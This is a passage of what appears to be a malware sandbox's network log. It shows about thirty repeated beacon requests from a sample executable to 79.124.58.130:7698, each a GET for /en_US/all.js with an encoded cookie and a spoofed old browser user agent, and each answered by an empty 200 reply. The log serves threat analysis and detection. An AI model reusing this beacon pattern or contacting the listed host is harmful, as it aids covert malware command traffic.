Oct 23, 2024 17:26:25.822983980 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:26:26.710427046 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:26:26 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.8	49756	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:26:26.821470976 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:26:27.702272892 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:26:27 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.8	49757	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:26:27.823152065 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:26:28.721196890 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:26:28 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.8	49759	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:26:28.836760998 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:26:29.741741896 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:26:29 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.8	49760	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:26:29.868125916 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:26:30.754081011 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:26:30 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.8	49761	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:26:30.883574009 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:26:31.769042015 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:26:31 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.8	49762	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:26:31.883672953 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:26:32.781876087 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:26:32 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.8	49763	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:26:32.900111914 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:26:33.797327995 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:26:33 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.8	49764	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:26:33.915798903 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:26:34.808461905 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:26:34 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.8	49765	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:26:34.930625916 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:26:36.383127928 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:26:35 GMT Content-Type: application/octet-stream Content-Length: 0
Oct 23, 2024 17:26:36.383399963 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:26:35 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.8	49766	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:26:36.496062040 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:26:37.398982048 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:26:37 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.8	49767	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:26:37.524421930 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:26:38.433073044 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:26:38 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.8	49768	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:26:38.557356119 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:26:39.436939001 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:26:39 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.8	49769	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:26:39.555394888 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:26:40.442514896 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:26:40 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.8	49770	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:26:40.555804014 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:26:41.458522081 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:26:41 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.8	49771	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:26:41.571196079 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:26:42.472769022 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:26:42 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.8	49772	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:26:42.586532116 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:26:43.476623058 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:26:43 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.8	49773	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:26:43.588315010 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:26:44.485373974 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:26:44 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.8	49774	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:26:44.602278948 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:26:45.500189066 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:26:45 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.8	49775	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:26:45.618558884 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:26:46.504832029 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:26:46 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.8	49776	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:26:46.618519068 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:26:47.538832903 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:26:47 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.8	49777	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:26:47.649406910 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:26:48.531480074 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:26:48 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.8	49778	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:26:48.716360092 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:26:49.566737890 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:26:49 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.8	49779	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:26:49.682638884 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:26:50.580481052 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:26:50 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.8	49780	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:26:50.700125933 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:26:51.594413042 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:26:51 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.8	49782	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:26:51.712182045 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:26:52.623183966 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:26:52 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.8	49783	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:26:52.743442059 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:26:53.633927107 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:26:53 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.8	49785	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:26:53.743293047 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:26:54.642301083 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:26:54 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.8	49786	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:26:54.759890079 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:26:55.652183056 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:26:55 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.8	49787	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:26:55.777584076 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:26:56.696655989 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:26:56 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.8	49788	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
